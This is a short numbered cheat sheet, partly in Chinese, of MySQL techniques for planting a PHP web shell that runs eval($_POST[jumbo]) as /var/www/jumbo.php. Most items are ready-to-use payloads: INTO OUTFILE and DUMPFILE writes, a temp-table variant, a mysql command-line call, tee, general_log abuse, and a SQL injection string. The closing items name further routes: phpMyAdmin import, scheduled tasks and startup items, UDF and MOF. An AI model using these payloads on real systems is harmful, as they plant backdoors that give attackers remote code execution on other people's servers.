1、select '<?php eval($_POST[jumbo]) ?>' into outfile '/var/www/jumbo.php';

2、select '<?php eval($_POST[jumbo]) ?>' into dumpfile '/var/www/jumbo.php';

3、Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[jumbo]) ?>');Select cmd from temp into out file '/var/www/jumbo.php';Drop TABLE IF EXISTS temp;

4、phpmyadmin导入.sql.zip

5、source /tmp/jumbo.sql

6、mysql -uuser -ppasswd -e "select '<?php eval($_POST[jumbo]) ?>' into outfile '/var/www/jumbo.php'"

7、tee /var/www/jumbo.php;select '<?php eval($_POST[jumbo]) ?>';

8、set global general_log=on;set global general_log_file='/var/www/jumbo.php';select '<?php eval($_POST[jumbo]) ?>';

9、aaa'into outfile '/var/www/jumbo.php' fields terminated by '<?php eval($_POST[jumbo]) ?>'#

10、计划任务、启动项

11、udf

12、mof